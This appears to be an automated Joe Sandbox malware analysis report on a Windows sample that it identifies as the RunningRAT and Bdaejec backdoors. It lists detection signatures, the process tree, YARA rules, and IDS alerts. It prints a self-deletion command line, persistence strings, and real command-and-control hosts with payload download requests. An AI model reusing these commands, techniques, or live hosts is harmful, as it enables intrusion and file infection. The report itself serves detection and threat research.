Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gE4NVCZDRk.exe

Overview

General Information

Sample name:gE4NVCZDRk.exe
renamed because original name is a hash value
Original sample name:02b3757b29002a8fcabd9afaebf1f7d3.exe
Analysis ID:1544387
MD5:02b3757b29002a8fcabd9afaebf1f7d3
SHA1:cecffd787a418e435a9019211dda54444c2184fd
SHA256:e909609bcd7d6a217635b372abba6e55d034d2e55712b032844ce28ded020064
Tags:32exeWormRamnit
Infos:

Detection

Bdaejec, RunningRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
Yara detected RunningRAT
AI detected suspicious sample
Checks if browser processes are running
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Self deletion via cmd or bat file
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • gE4NVCZDRk.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\gE4NVCZDRk.exe" MD5: 02B3757B29002A8FCABD9AFAEBF1F7D3)
    • XekSuT.exe (PID: 6180 cmdline: C:\Users\user\AppData\Local\Temp\XekSuT.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 5696 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cmd.exe (PID: 2476 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 2844 cmdline: ping 127.0.0.1 -n 1 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • svchost.exe (PID: 5676 cmdline: C:\Windows\SysWOW64\svchost.exe -k "SySyeu" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • svchost.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\svchost.exe -k "SySyeu" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
    • SySyeu.exe (PID: 3260 cmdline: C:\Windows\system32\SySyeu.exe "c:\users\user\appdata\local\temp\6011859.dll",MainThread MD5: 889B99C52A60DD49227C5E485A016679)
  • svchost.exe (PID: 2412 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4888 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WMIADAP.exe (PID: 6180 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Running RATNJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server to change the address the trojan communicates with. The second DLL gathers information about the victim's system, including its operating system and driver and processor information. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-bugging techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
gE4NVCZDRk.exeJoeSecurity_RunningRATYara detected RunningRATJoe Security
    gE4NVCZDRk.exeGoldDragon_RunningRATDetects Running RAT from Gold Dragon reportFlorian Roth
    • 0x402f:$a1: emanybtsohteg
    • 0x405d:$a2: tekcosesolc
    • 0x4089:$a3: emankcosteg
    • 0x4095:$a4: emantsohteg
    • 0x406a:$a5: tpokcostes
    • 0x400e:$a6: putratSASW
    gE4NVCZDRk.exeMALWARE_Win_RunningRATDetects RunningRATditekSHen
    • 0x9bb0:$s1: %s%d.dll
    • 0x9cbc:$s2: /c ping 127.0.0.1 -n
    • 0x9cd6:$s3: del /f/q "%s"
    • 0x9ac8:$s4: GUpdate
    • 0x9c8c:$s5: %s\%d.bak
    • 0x9bc5:$s6: "%s",MainThread
    • 0x9bd8:$s7: rundll32.exe
    • 0x4089:$rev1: emankcosteg
    • 0x42ae:$rev3: daerhTniaM,"s%" s%
    • 0x4602:$rev4: s% etadpUllD,"s%" 23lldnuR
    • 0x472f:$rev5: ---DNE yromeMmorFdaoL
    • 0x4724:$rev6: eMnigulP
    • 0x429f:$rev7: exe.23lldnuR\
    • 0x45a8:$rev8: dnammoc\nepo\llehs\
    • 0x45df:$rev8: dnammoc\nepo\llehs\
    • 0x4789:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
    • 0x402f:$rev10: emanybtsohteg
    • 0x405d:$rev11: tekcosesolc
    • 0x406a:$rev12: tpokcostes
    • 0x4095:$rev13: emantsohteg

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\6011859.dllMALWARE_Win_RunningRATDetects RunningRATditekSHen
    • 0x5534:$s4: GUpdate
    • 0x514c:$s5: %s\%d.bak
    • 0x55e3:$s6: "%s",MainThread
    • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
    • 0x515c:$v2_2: LoadFromMemory END---
    • 0x51d0:$v2_3: hmProxy!= NULL
    • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
    • 0x5610:$v2_6: %d*%sMHz

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_RunningRATYara detected RunningRATJoe Security
      Process Memory Space: gE4NVCZDRk.exe PID: 7112JoeSecurity_RunningRATYara detected RunningRATJoe Security
        Process Memory Space: XekSuT.exe PID: 6180JoeSecurity_BdaejecYara detected BdaejecJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.svchost.exe.10000000.0.unpackMALWARE_Win_RunningRATDetects RunningRATditekSHen
          • 0x5534:$s4: GUpdate
          • 0x514c:$s5: %s\%d.bak
          • 0x55e3:$s6: "%s",MainThread
          • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
          • 0x515c:$v2_2: LoadFromMemory END---
          • 0x51d0:$v2_3: hmProxy!= NULL
          • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
          • 0x5610:$v2_6: %d*%sMHz
          0.2.gE4NVCZDRk.exe.4032a0.1.raw.unpackMALWARE_Win_RunningRATDetects RunningRATditekSHen
          • 0x6910:$s1: %s%d.dll
          • 0x6a1c:$s2: /c ping 127.0.0.1 -n
          • 0x6a36:$s3: del /f/q "%s"
          • 0x5534:$s4: GUpdate
          • 0x6828:$s4: GUpdate
          • 0x514c:$s5: %s\%d.bak
          • 0x69ec:$s5: %s\%d.bak
          • 0x55e3:$s6: "%s",MainThread
          • 0x6925:$s6: "%s",MainThread
          • 0x6938:$s7: rundll32.exe
          • 0x50ec:$v2_1: %%SystemRoot%%\System32\svchost.exe -k "%s"
          • 0x515c:$v2_2: LoadFromMemory END---
          • 0x51d0:$v2_3: hmProxy!= NULL
          • 0x5284:$v2_4: Rundll32 "%s",DllUpdate %s
          • 0x5610:$v2_6: %d*%sMHz
          0.0.gE4NVCZDRk.exe.400000.0.unpackJoeSecurity_RunningRATYara detected RunningRATJoe Security
            0.0.gE4NVCZDRk.exe.400000.0.unpackGoldDragon_RunningRATDetects Running RAT from Gold Dragon reportFlorian Roth
            • 0x402f:$a1: emanybtsohteg
            • 0x405d:$a2: tekcosesolc
            • 0x4089:$a3: emankcosteg
            • 0x4095:$a4: emantsohteg
            • 0x406a:$a5: tpokcostes
            • 0x400e:$a6: putratSASW
            0.0.gE4NVCZDRk.exe.400000.0.unpackMALWARE_Win_RunningRATDetects RunningRATditekSHen
            • 0x9bb0:$s1: %s%d.dll
            • 0x9cbc:$s2: /c ping 127.0.0.1 -n
            • 0x9cd6:$s3: del /f/q "%s"
            • 0x9ac8:$s4: GUpdate
            • 0x9c8c:$s5: %s\%d.bak
            • 0x9bc5:$s6: "%s",MainThread
            • 0x9bd8:$s7: rundll32.exe
            • 0x4089:$rev1: emankcosteg
            • 0x42ae:$rev3: daerhTniaM,"s%" s%
            • 0x4602:$rev4: s% etadpUllD,"s%" 23lldnuR
            • 0x472f:$rev5: ---DNE yromeMmorFdaoL
            • 0x4724:$rev6: eMnigulP
            • 0x429f:$rev7: exe.23lldnuR\
            • 0x45a8:$rev8: dnammoc\nepo\llehs\
            • 0x45df:$rev8: dnammoc\nepo\llehs\
            • 0x4789:$rev9: "s%" k- exe.tsohcvs\23metsyS\%%tooRmetsyS%
            • 0x402f:$rev10: emanybtsohteg
            • 0x405d:$rev11: tekcosesolc
            • 0x406a:$rev12: tpokcostes
            • 0x4095:$rev13: emantsohteg
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe -k "SySyeu", CommandLine: C:\Windows\SysWOW64\svchost.exe -k "SySyeu", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe -k "SySyeu", ProcessId: 5676, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-29T10:58:59.583625+010028079081Malware Command and Control Activity Detected192.168.2.44973044.221.84.105799TCP
            2024-10-29T10:59:00.276781+010028079081Malware Command and Control Activity Detected192.168.2.44973144.221.84.105799TCP
            2024-10-29T10:59:00.976850+010028079081Malware Command and Control Activity Detected192.168.2.44973244.221.84.105799TCP
            2024-10-29T10:59:01.671009+010028079081Malware Command and Control Activity Detected192.168.2.44973344.221.84.105799TCP
            2024-10-29T10:59:02.288886+010028079081Malware Command and Control Activity Detected192.168.2.44973444.221.84.105799TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-29T10:58:58.815691+010028385221Malware Command and Control Activity Detected192.168.2.4557161.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-29T10:58:58.815691+010028148971Malware Command and Control Activity Detected192.168.2.449743119.91.152.1518321TCP
            2024-10-29T10:59:11.785152+010028148971Malware Command and Control Activity Detected192.168.2.449735119.91.152.1518321TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: gE4NVCZDRk.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
            Source: C:\Users\user\AppData\Local\Temp\6011859.dllAvira: detection malicious, Label: BDS/Backdoor.Gen7
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\6011859.dllReversingLabs: Detection: 95%
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeReversingLabs: Detection: 97%
            Multi AV Scanner detection for submitted file
            Source: gE4NVCZDRk.exeReversingLabs: Detection: 97%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\6011859.dllJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
            Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: gE4NVCZDRk.exeJoe Sandbox ML: detected
            Source: gE4NVCZDRk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
            Source: Binary string: rundll32.pdb source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr
            Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000003.00000003.1684739802.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, SySyeu.exe, 00000007.00000000.1726094464.0000000000E11000.00000020.00000001.01000000.00000009.sdmp, SySyeu.exe.3.dr

            Spreading

            barindex
            Infects executable files (exe, dll, sys, html)
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_003C29E2
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_003C2B8C
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:55716 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2814897 - Severity 1 - ETPRO MALWARE W32.YoungLotus Checkin : 192.168.2.4:49735 -> 119.91.152.151:8321
            Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49733 -> 44.221.84.105:799
            Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49731 -> 44.221.84.105:799
            Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799
            Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49732 -> 44.221.84.105:799
            Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49734 -> 44.221.84.105:799
            Source: Network trafficSuricata IDS: 2814897 - Severity 1 - ETPRO MALWARE W32.YoungLotus Checkin : 192.168.2.4:49743 -> 119.91.152.151:8321
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 799
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
            Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
            Source: global trafficTCP traffic: 192.168.2.4:49735 -> 119.91.152.151:8321
            Source: Joe Sandbox ViewIP Address: 119.91.152.151 119.91.152.151
            Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
            Source: Joe Sandbox ViewASN Name: CNNIC-QCN-APQingdaoCableTVNetworkCenterCN CNNIC-QCN-APQingdaoCableTVNetworkCenterCN
            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownTCP traffic detected without corresponding DNS query: 119.91.152.151
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_003C1099
            Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
            Source: XekSuT.exe, 00000001.00000003.1681276523.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, XekSuT.exe, 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
            Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
            Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/=
            Source: XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/e
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmp, XekSuT.exe, 00000001.00000002.1891528876.000000000153E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
            Source: XekSuT.exe, 00000001.00000002.1891528876.000000000153E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarmOg
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarA
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar?
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarr
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar-
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar=1
            Source: XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC
            Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
            Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
            Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
            Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
            Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
            Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
            Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
            Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
            Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
            Source: XekSuT.exe, 00000001.00000002.1891528876.00000000015AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
